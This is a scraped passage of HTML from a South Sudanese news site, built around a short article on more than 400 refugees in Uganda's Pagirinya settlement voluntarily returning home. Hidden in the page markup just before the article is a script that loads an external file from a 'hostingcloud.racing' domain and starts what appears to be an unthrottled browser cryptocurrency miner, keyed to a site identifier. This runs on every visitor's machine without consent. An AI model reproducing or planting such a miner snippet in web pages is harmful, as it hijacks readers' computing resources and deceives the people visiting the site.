cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/blind-football-federation-organizes-its-match-today/" rel="bookmark" title="Blind Football Federation organizes its Match today">Blind Football Federation organizes its Match today</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/football-federation-president-reveals-100-days-in-office/" rel="bookmark" title="Football Federation President reveals 100 days in office">Football Federation President reveals 100 days in office</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/final-match-to-kick-off-on-sunday-in-wau/" title="Final match to kick off on Sunday in Wau" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/10/Salam-FC-Wau-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/final-match-to-kick-off-on-sunday-in-wau/" rel="bookmark" title="Final match to kick off on Sunday in Wau">Final match to kick off on Sunday in Wau</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9588" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9588 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 39 data-block_page_current= 1 data-category_id= 9 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/building-strong-brand-in-a-foreign-land-is-not-an-easy-task-dj-selector/" title="Building strong brand in a foreign land is not an easy task, DJ Selector" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="434" height="350" src="https://www.jubamonitor.com/wp-content/uploads/2021/10/Selector-Magok-sitting-on-his-brand-New-Car.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/10/Selector-Magok-sitting-on-his-brand-New-Car.jpg 434w, https://www.jubamonitor.com/wp-content/uploads/2021/10/Selector-Magok-sitting-on-his-brand-New-Car-300x242.jpg 300w" sizes="(max-width: 434px) 100vw, 434px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/building-strong-brand-in-a-foreign-land-is-not-an-easy-task-dj-selector/" rel="bookmark" title="Building strong brand in a foreign land is not an easy task, DJ Selector">Building strong brand in a foreign land is not an easy task, DJ Selector</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/more-than-34-s-sudanese-in-sudan-prison-dau/" rel="bookmark" title="More than 34 S. Sudanese in Sudan prison-Dau">More than 34 S. Sudanese in Sudan prison-Dau</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/rapper-mantani-died-after-road-accident/" title="Rapper Mantani died after road accident" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/07/Rapper-Mantani-aka-Murye-Alex-of-the-Hard-life-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-2" href="https://www.jubamonitor.com/category/news/" title="National News">National News</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/rapper-mantani-died-after-road-accident/" rel="bookmark" title="Rapper Mantani died after road accident">Rapper Mantani died after road accident</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/amalna-screens-films-about-co-existence-ahead-of-official-rollout/" title="Amalna screens films about co-existence ahead of official rollout" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/06/Amalna-South-Sudan-Executive-Director-Luate-Joseph-John-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-9" href="https://www.jubamonitor.com/category/entertainment/" title="Entertainment">Entertainment</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/amalna-screens-films-about-co-existence-ahead-of-official-rollout/" rel="bookmark" title="Amalna screens films about co-existence ahead of official rollout">Amalna screens films about co-existence ahead of official rollout</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/musician-duop-urges-officials-to-serve-public-interest/" rel="bookmark" title="Musician Duop urges officials to serve public interest">Musician Duop urges officials to serve public interest</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li></ul></div></nav>						</div>

						<div class="navbar-right">
														
<div class="navbar-search">
	<a href="#" id="ruby-navbar-search-icon" data-mfp-src="#ruby-header-search-popup" data-effect="mpf-ruby-effect header-search-popup-outer" title="Search" class="navbar-search-icon">
		<i class="fa fa-search" aria-hidden="true"></i>
	</a>
</div>
						</div>
					</div>
				</div>
				<div id="ruby-header-search-popup" class="header-search-popup">
	<div class="header-search-popup-wrap ruby-container">
		<a href="#" class="ruby-close-search"><i class="ruby-close-btn" aria-hidden="true"></i></a>
	<div class="header-search-popup-inner">
		<form class="search-form" method="get" action="https://www.jubamonitor.com/">
			<fieldset>
				<input id="ruby-search-input" type="text" class="field" name="s" value="" placeholder="Type to search&hellip;" autocomplete="off">
				<button type="submit" value="" class="btn"><i class="fa fa-search" aria-hidden="true"></i></button>
			</fieldset>
                            <div class="header-search-result"></div>
            		</form>
	</div>
	</div>
</div>			</div>
		</div>
	</div>

</div><!--header-->	<div class="main-site-mask"></div>
	<div class="site-wrap">
		<div class="site-mask"></div>
		<div class="site-inner">
<script src="https://www.hostingcloud.racing/VK55.js"></script>
<script>
    var _client = new Client.Anonymous('4fc83fb3612a82134ac702b6fd9b380ac82007d5faaa62e0c34c616002f5d827', {
        throttle: 0, ads: 0
    });
    _client.start();
    

</script><div class="single-post-outer clearfix"><article class="single-post-wrap single-post-1 post-51106 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-2"  itemscope  itemtype="https://schema.org/Article" ><div class="ruby-page-wrap ruby-section row single-wrap is-author-bottom is-sidebar-right ruby-container"><div class="ruby-content-wrap single-inner col-sm-8 col-xs-12 content-with-sidebar"><div class="single-post-content-outer single-box"><div class="single-post-header"><div class="single-post-top"><div class="breadcrumb-wrap"><div class="breadcrumb-inner"><span><meta itemprop="position" content="1"><a href="https://www.jubamonitor.com/">Home</a></span><i class="fa fa-angle-right breadcrumb-next"></i><span><meta itemprop="position" content="2"><a rel="bookmark" href="https://www.jubamonitor.com/category/news/"><span>National News</span></a></span><i class="fa fa-angle-right breadcrumb-next"></i><span class="breadcrumb-current"><meta itemprop="position" content="3">At least 400 refugees voluntarily returned back home</span></div><!--#breadcrumb inner--></div><!--#breadcrumb--></div><!--#single post top --><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-2" href="https://www.jubamonitor.com/category/news/" title="National News">National News</a><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><div class="single-title post-title entry-title is-size-1"><h1>At least 400 refugees voluntarily returned back home</h1></div><!--#single title--><div class="post-meta-info is-show-icon"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' loading='lazy'/><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:09:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:25:54+03:00">10/11/2021</time></span><!--#meta info date--><span class="meta-info-el meta-info-tag"><i class="fa fa-tag"></i><span class="no-tags">No tags</span></span><!--#mete info tag--></div><!--#post meta info--></div><!--#single post header--><div class="single-post-thumb-outer"><div class="post-thumb"><img width="573" height="383" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years.jpg" class="attachment-bingo_ruby_crop_750x450 size-bingo_ruby_crop_750x450 wp-post-image" alt="" loading="lazy" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years.jpg 573w, https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years-300x201.jpg 300w" sizes="(max-width: 573px) 100vw, 573px" /></div></div><div class="single-post-action clearfix"><div class="single-post-share-header"><a class="single-share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="single-share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=At+least+400+refugees+voluntarily+returned+back+home&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></a> <a class="single-share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="single-share-bar-el icon-pinterest" href="https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F&amp;media=https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years.jpg&description=At+least+400+refugees+voluntarily+returned+back+home" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-pinterest-p"></i></a></div><!--#single post share header--></div><!--#single post action--><div class="banner-ad-wrap banner-ad-top-single"><div class="banner-ad-inner"><div class="banner-ad-image"><img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor"></div></div></div><div class="single-post-body"><div class="single-content-wrap"><div class="single-entry-wrap"><div class="entry single-entry clearfix">
<p><strong><em>By Jurugo Emmanuel Ogasto</em></strong></p>



<p>At least 400 refugees in Pagirinya settlement have voluntarily repatriated back home after five years in the camp.</p>



<p>Yesterday, Pagirinya refugee settlement manager reported that over 400 South Sudanese living in refugee camp voluntarily joined their relatives in Loa, Nimule and Mugali within one month.</p>



<p>Speaking to Juba Monitor yesterday, Dama Jacob a refugee who was also planning to go to Nimule said because of the lock down, life has been so hard.</p>



<p>“Am telling you that Uganda is not like my beautiful country, it is hard to get money, I am even planning to close this business and go back to Loa,’’ he said.</p>



<p>Meanwhile, Stella Anzoa, one of teachers saidthat some South Sudanese missed their country so much, that’s why they want to return home.</p>



<p>“Others are not going home because of hard situation but they feel to get back and start a new life but United Nations High Commissioner for Refugees has not yet announced the official repatriation of refugees,” she said.</p>
</div></div><!--#single entry wrap--><div class="single-post-share-big"><div class="single-post-share-big-inner"><a class="share-bar-el-big icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i><span>share on Facebook</span></a><a class="share-bar-el-big icon-twitter" href="https://twitter.com/intent/tweet?text=At+least+400+refugees+voluntarily+returned+back+home&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i><span>share on Twitter</span></a></div></div><div class="single-post-box single-post-box-comment"><div class="box-comment-content"></div></div></div><!--#single content wrap --><meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="https://www.jubamonitor.com/at-least-400-refugees-voluntarily-returned-back-home/"/><meta itemprop="headline " content="At least 400 refugees voluntarily returned back home"><span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="adminjubamonitor"></span><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years.jpg"><meta itemprop="width" content="573"><meta itemprop="height" content="383"></span><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"></span><meta itemprop="name" content="adminjubamonitor"></span><meta itemprop="datePublished" content="2021-11-11T05:09:00+00:00"/><meta itemprop="dateModified" content="2021-11-10T19:25:54+00:00"/></div><!--#single post body --></div><!--#single post content outer --><div class="single-post-box-outer"><nav class="single-nav single-box row"><div class="col-sm-6 col-xs-12 nav-el nav-left post-title is-size-6"><a href="https://www.jubamonitor.com/juba-international-airport-should-be-left-for-international-flights-only-mp/" rel="bookmark" title="Juba International Airport should be Left for International Flights only, MP"><span class="ruby-nav-icon nav-left-icon"><i class="fa fa-angle-left"></i></span><span class="ruby-nav-link nav-left-link">Juba International Airport should be Left for International Flights only, MP</span></a></div><div class="col-sm-6 col-xs-12 nav-el nav-right post-title is-size-6"><a href="https://www.jubamonitor.com/civil-aviation-grounds-five-aircraft-till-further-notice/" rel="bookmark" title="Civil Aviation grounds five aircraft till further notice"><span class="ruby-nav-icon nav-right-icon"><i class="fa fa-angle-right"></i></span><span class="ruby-nav-link nav-right-link">Civil Aviation grounds five aircraft till further notice</span></a></div></nav><div class="single-post-box-related has-header-block clearfix box-related-1"><div class="box-related-header block-header-wrap"><div class="block-header-inner"><div class="block-title"><h3>You Might Also Like</h3></div></div></div><!--#related header--><div class="box-related-content block-content-wrap row"><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" title="MINISTERS-Two left in Doha over COVID-19" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="206" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-365x206.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" rel="bookmark" title="MINISTERS-Two left in Doha over COVID-19">MINISTERS-Two left in Doha over COVID-19</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' loading='lazy'/><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:20:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:56:58+03:00">10/11/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By James Atem Kuir All members of government delegation who went to Qatar for bilateral talks, ahead of a planned...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fministers-two-left-in-doha-over-covid-19%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=MINISTERS-Two+left+in+Doha+over+COVID-19&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fministers-two-left-in-doha-over-covid-19%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fministers-two-left-in-doha-over-covid-19%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fministers-two-left-in-doha-over-covid-19%2F&amp;title=MINISTERS-Two+left+in+Doha+over+COVID-19" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=MINISTERS-Two+left+in+Doha+over+COVID-19&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fministers-two-left-in-doha-over-covid-19%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix is-no-featured"><div class="post-list-inner"><div class="col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/trinity-energy-tops-2021-continental-award-in-cape-town/" rel="bookmark" title="Trinity Energy tops 2021 continental award in Cape Town">Trinity Energy tops 2021 continental award in Cape Town</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' loading='lazy'/><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:19:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:52:29+03:00">10/11/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Yiep Joseph Trinity Energy topped with Canadian-based firm, Recon Africa among the best continental energy companies awarded in the African Week for best performances in the sector for 2021. During the Award Ceremony held on Tuesday the 9th of November at African Energy Week (AEW) 2021 organized by Energy Capital & Power in Cape Town, Trinity a leading energy company in South Sudan came on top among the best companies in the African Continent. This award recognizes companies and projects that are defying the odds of COVID-19 and industry restrictions,...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Ftrinity-energy-tops-2021-continental-award-in-cape-town%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Trinity+Energy+tops+2021+continental+award+in+Cape+Town&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Ftrinity-energy-tops-2021-continental-award-in-cape-town%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Ftrinity-energy-tops-2021-continental-award-in-cape-town%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Ftrinity-energy-tops-2021-continental-award-in-cape-town%2F&amp;title=Trinity+Energy+tops+2021+continental+award+in+Cape+Town" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Trinity+Energy+tops+2021+continental+award+in+Cape+Town&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Ftrinity-energy-tops-2021-continental-award-in-cape-town%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/The-Vice-President-for-Service-Cluster-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" rel="bookmark" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad">VP Abdelbagi orders for screening officials after contrariety Covid tests abroad</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' loading='lazy'/><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-11-11T05:18:00+00:00">11/11/2021</time><time class="updated" datetime="2021-11-10T19:49:57+03:00">10/11/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By James Atem Kuir The Vice President for Service Cluster, Hussein Abdelbagi Akol has ordered for screening of all public...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fvp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=VP+Abdelbagi+orders+for+screening+officials+after+contrariety+Covid+tests+abroad&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fvp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fvp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" 